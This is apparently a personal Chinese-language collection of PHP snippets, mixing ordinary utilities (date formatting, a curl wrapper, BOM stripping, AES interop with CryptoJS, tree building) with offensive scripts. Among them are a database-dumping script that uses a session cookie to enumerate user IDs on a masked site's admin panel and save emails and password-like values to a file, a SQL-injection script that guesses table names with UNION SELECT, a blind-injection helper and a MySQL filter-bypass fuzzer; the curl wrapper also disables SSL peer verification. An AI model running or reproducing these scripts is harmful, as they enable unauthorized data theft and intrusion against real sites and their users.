#php 日期转换成TZ格式
$time_tz_str = str_replace('+00:00', 'Z', gmdate('c', time())); #2020-07-21T12:11:11Z
#trim 移除字符串
function strim($string,$removestring){ if (!is_string($string) || !is_string($removestring)){ return $string; } $result = preg_replace("/^{$removestring}|{$removestring}$/", "", $string); return $result; }
#这样改strim会更好一点 function strim($string,$removestring=''){ if (!is_string($string)){ return $string; } if (!$removestring){ return trim($string); } $result = preg_replace("/^{$removestring}|{$removestring}$/", "", $string); return $result; }
#curl request
function curl_request($url,$post='',$cookie='', $returnCookie=0){ $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)'); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($curl, CURLOPT_AUTOREFERER, 1); curl_setopt($curl, CURLOPT_REFERER, "http://XXX"); if($post) { curl_setopt($curl, CURLOPT_POST, 1); //curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($post)); curl_setopt($curl, CURLOPT_POSTFIELDS, $post); } if($cookie) { curl_setopt($curl, CURLOPT_COOKIE, $cookie); } curl_setopt($curl, CURLOPT_HEADER, $returnCookie); curl_setopt($curl, CURLOPT_TIMEOUT, 10); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 1); //ssl 这两行代码是为了能走https的请求,http请求放着也没有影响 curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); //ssl 这两行代码是为了能走https的请求,http请求放着也没有影响 $data = curl_exec($curl); if (curl_errno($curl)) { return curl_error($curl); } curl_close($curl); if($returnCookie){ list($header, $body) = explode("\r\n\r\n", $data, 2); preg_match_all("/Set\-Cookie:([^;]*);/", $header, $matches); $info['cookie'] = substr($matches[1][0], 1); $info['content'] = $body; return $info; }else{ return $data; } }
#php remove bom str
function str_remove_bom($str){ $charset[1] = substr($str, 0, 1); $charset[2] = substr($str, 1, 1); $charset[3] = substr($str, 2, 1); if (ord($charset[1]) == 239 && ord($charset[2]) == 187 && ord($charset[3]) == 191) { $rest = substr($str, 3); return $rest; } else{ return $str; } }
#php实现内存地址反转
function array_endtostart($hex){ $a_tmp=str_split($hex,2); $result=array_reverse($a_tmp); $hexstr=join("",$result); return $hexstr; }
#php 实现汇编中的pxor
function xortnew($a,$b){ $a_tmp=str_split($a,2); $b_tmp=str_split($b,2); $result=""; foreach($a_tmp as $key=>$value){ $a_b=hex2bin($value); $b_b=hex2bin($b_tmp[$key]); $r = $a_b ^ $b_b; $result .=bin2hex($r); } return $result; } var_dump(xortnew("3e213b21343d3c3e00000002253a600c","0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c"));
#php 查找字符串与替换
function tapreplace($str){ $newstr=preg_replace_callback("/(<pre.*<\/pre>)/s",function ($match){ $text=preg_replace("/\t/"," ",$match[0]); $text=preg_replace("/'/","'",$text); $text=preg_replace("/#/","#",$text); $text=preg_replace("/\"/",""",$text); $text=preg_replace("/'/","'",$text); return $text; },$str); return $newstr; }
#dokuwiki在php7下报operator not supported for strings in 错
inc\lessc.inc.php
public $importDir = ''; #改为 public $importDir = array();
#CryptoJS 与php互通
#CryptoJS 中 #128位AES加密 var key = CryptoJS.lib.WordArray.random(16); var iv = CryptoJS.lib.WordArray.random(16); var encrypted = CryptoJS.AES.encrypt("teststring", key, {iv:iv}); #php: $key_str = hex2bin('xxxxxxx'); $iv_str = hex2bin('xxxxxxx'); $str="xxxxx"; $result =openssl_decrypt($str,'aes-128-cbc',$key_str,false,$iv_str); #192 aes var key = CryptoJS.lib.WordArray.random(24); var iv = CryptoJS.lib.WordArray.random(16); var encrypted = CryptoJS.AES.encrypt("teststring", key, {iv:iv}); #php: $key_str = hex2bin('xxxxxxx'); $iv_str = hex2bin('xxxxxxx'); $str="xxxxx"; $result =openssl_decrypt($str,'aes-192-cbc',$key_str,false,$iv_str); #256 aes: var key = CryptoJS.lib.WordArray.random(32); var iv = CryptoJS.lib.WordArray.random(16); var encrypted = CryptoJS.AES.encrypt("teststring", key, {iv:iv}); #php: $key_str = hex2bin('xxxxxxx'); $iv_str = hex2bin('xxxxxxx'); $str="xxxxx"; $result =openssl_decrypt($str,'aes-256-cbc',$key_str,false,$iv_str);
#php try catch warning
set_error_handler(function($errno, $errstr, $errfile, $errline, array $errcontext) { // error was suppressed with the @-operator if (0 === error_reporting()) { return false; } throw new ErrorException($errstr, 0, $errno, $errfile, $errline); }); #然后直接try就可以了 try{ if (preg_match("/{$rule}/", $result['url'])) { $end['match']=1; $end['code_error']=0; } if ($result['code'] == 404) { $end['code_error']=1; } }catch (Exception $e){ var_dump($rule); }
#数组对象转换
/** * 数组 转 对象 * * @param array $arr 数组 * @return object */ function array_to_object($arr) { if (gettype($arr) != 'array') { return; } foreach ($arr as $k => $v) { if (gettype($v) == 'array' || gettype($v) == 'object') { $arr[$k] = (object)array_to_object($v); } } return (object)$arr; } /** * 对象 转 数组 * * @param object $obj 对象 * @return array */ function object_to_array($obj) { $obj = (array)$obj; foreach ($obj as $k => $v) { if (gettype($v) == 'resource') { return; } if (gettype($v) == 'object' || gettype($v) == 'array') { $obj[$k] = (array)object_to_array($v); } } return $obj; }
#一个无极限分类
function get_tree($result){ $tree = array(); foreach($result as $item){ if(isset($result[$item['pid']])){ $result[$item['pid']]['son'][] = &$result[$item['pro_id']]; }else{ $tree[] = &$result[$item['pro_id']]; } } return $tree; } //生成无极限的数据 //用递归展示处理的数据 function getviewdata($data,$level=0){ foreach($data as $key=>$value){ for($i=0;$i<=$level;$i++){ echo '  '; } echo $value['pro_name']; echo '<br>'; if(!empty($value['son'])){ getviewdata($value['son'],$level+1); } } } getviewdata($xx);
#某脱库脚本
function getuidinfo($i){ sleep(0.5); $url="http://www.xxx.cn/admin.php?s=/product/order/index/uid/{$i}"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/xxx (KHTML, like Gecko) Chrome/xxx Safari/xxx'); curl_setopt($ch, CURLOPT_REFERER,'http://www.xxx.cn/admin.php?s=/product/order/index/uid/24'); curl_setopt($ch, CURLOPT_COOKIE,'PHPSESSID=vhbnfht14o07cvrhnuq5ir6o77'); $output = curl_exec($ch); curl_close($ch); preg_match_all('/<tbody>.*<\/tbody>/ims',$output,$result); if(!isset($result[0][0]) || !$result[0][0]){ return array(); } $tmp_array= explode("\n",$result[0][0]); if(!$tmp_array){ return array(); } $result_out=array(); foreach ($tmp_array as $a_tmp){ $a_tmp = trim($a_tmp); if(!preg_match('/^<td>\d+<\/td>/',$a_tmp)){ continue; } preg_match('#^<td>\d+</td><td>.*</td><td>(.*)</td><td>\d+\.\d+</td><td>[^<]*</td><td>[^<]*</td><td><a[^>]*>([^<]*)</a></td>#',$a_tmp,$a_result); $result_out[]=$a_result[1]; $account_name = $a_result['2']; } if (!isset($account_name)){ return array(); } $result_out=array_unique($result_out); $return['email']=$account_name; $return['pid']=$result_out; return $return; } function getproduct($product_id){ sleep(0.5); $url="http://www.xxx.cn/admin.php?s=/product/user/index&keyword={$product_id}"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/xxx (KHTML, like Gecko) Chrome/xxx Safari/xxx'); curl_setopt($ch, CURLOPT_REFERER,'http://www.xxx.cn/admin.php?s=/product/order/index/uid/24'); curl_setopt($ch, CURLOPT_COOKIE,'PHPSESSID=vhbnfht14o07cvrhnuq5ir6o77'); $output = curl_exec($ch); curl_close($ch); preg_match_all('/<tbody>.*<\/tbody>/ims',$output,$result); if(!isset($result[0][0]) || !$result[0][0]){ return array(); } $tmp_array= explode("\n",$result[0][0]); if(!$tmp_array){ return array(); } $result=array(); foreach ($tmp_array as $a_tmp){ $a_tmp = trim($a_tmp); if(!preg_match('/^<td>\d+<\/td>/',$a_tmp)){ continue; } preg_match('#^<td>\d+</td><td><a[^>]*>[^<]*</a></td><td>[^<]*</td><td>([^<]*)</td>#',$a_tmp,$a_result); $result=$a_result[1]; } if(!$result){ return array(); } return $result; } for($i=1;$i<32167;$i++){ $uidinfo = getuidinfo($i); if(!$uidinfo){ continue; } echo $i."\n"; $strs = "uid:{$i} email:".$uidinfo['email'].":"; $pwd_tmp=array(); foreach($uidinfo['pid'] as $pid){ $pwd = getproduct($pid); if(!$pwd){ continue; } $pwd_tmp[]=$pwd; } $pwd_tmp=array_unique($pwd_tmp); $pwd_str =implode("|",$pwd_tmp); $strs .=$pwd_str."\n"; file_put_contents("pwd.txt",$strs,8); sleep(0.5); }
#thinkphp路由模式
http://www.xxx.net/product/index/xxx/id/29192 => http://www.xxx.net/index.php?m=product&c=index&a=xxx&id=29192
#跑表名
set_time_limit(0); $tables = file("tables"); foreach ($tables as $a_tables){ $a_tables = trim($a_tables); $url = "http://www.xxx.net/product/index/xxx/id/29192) and 1=1 and 1=2 union select 29192,29192,29192,2,2,4,5,(select id from ss_{$a_tables} where id>1 limit 0,1 ),7,8,9,10,2 -- a"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch,CURLOPT_COOKIE,'PHPSESSID=ddk0k3c1q3a9nio7rl4fkihtf4'); $output = curl_exec($ch); curl_close($ch); $garbage = strstr($output, "exist"); if($garbage == false) { echo $a_tables."<br>"; } sleep(2); }
#inject
$i = $_GET['id']; sleep(1); $url = "http://xxx.xxx.net/xxx/index/xxx/id/29192) and 1={$i} --"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch,CURLOPT_COOKIE,'PHPSESSID=ddk0k3c1q3a9nio7rl4fkihtf4'); $output = curl_exec($ch); curl_close($ch); print_r($output);
#fuzz1
<?php $con=mysqli_connect("localhost","root","123456","test"); if (mysqli_connect_errno($con)) { echo 111; exit; } for($i=0;$i<255;$i++) { for($j=0;$j<255;$j++) { $char_str = chr($i); $charj_str = chr($j); $strs = "select count(*) from `information_schema`{$char_str}{$charj_str}`SCHEMATA`"; $result=mysqli_query($con,$strs); $posts = array(); while($row = @mysqli_fetch_array($result)) { $posts[] = $row; } if(isset($posts[0]) && $posts[0][0]==10 ){ echo "<font color=red>aaaa</font>{$i}|{$j}<br>"; } } } mysqli_close($con);
#毫秒
list($usec, $sec) = explode(" ", microtime()); $lusec = sprintf('%03d',$usec*1000);